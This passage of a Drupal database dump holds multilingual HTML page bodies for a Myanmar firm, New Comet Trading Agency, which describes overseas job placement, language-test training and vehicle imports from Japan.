lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 181, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 181, 'ja', 0, '<h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong>弊社ウェブサイト「NEW COMET TRADING AGENCY」へようこそ！</strong></h3><h3 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\"><strong><img src=\"/sites/default/files/inline-images/0-02-06-4f55b8ebb3b47b4a42250c8beee726bd7e8c58d2421acc8cb9e74564397af8ac_915ef54ff9aea418.jpg\" data-entity-uuid=\"11bdd5ab-02ab-46db-adb5-ee71d641622a\" data-entity-type=\"file\"></strong></h3><h6 style=\"-webkit-text-stroke-width:0px;background-color:rgb(244, 244, 244);box-sizing:border-box;color:rgb(52, 52, 52);font-family:pyidaungsu;font-size:1.7em;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;letter-spacing:normal;line-height:40px;margin:0px 0px 1rem;orphans:2;padding:0px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">当社のウェブサイト、「NEW COMET TRADING AGENCY」へようこそ！ご訪問いただき、大変嬉しく思っています。当ウェブサイトをお楽しみいただき、提供しているサービスや機会についてさらに詳しくご覧ください。何か質問やお手伝いがございましたら、お気軽にお問い合わせください。私たちは皆様の目標達成の旅をサポートするためにここにいます。<o:p></o:p><o:p></o:p></h6>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 181, 'ko', 0, '<h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun 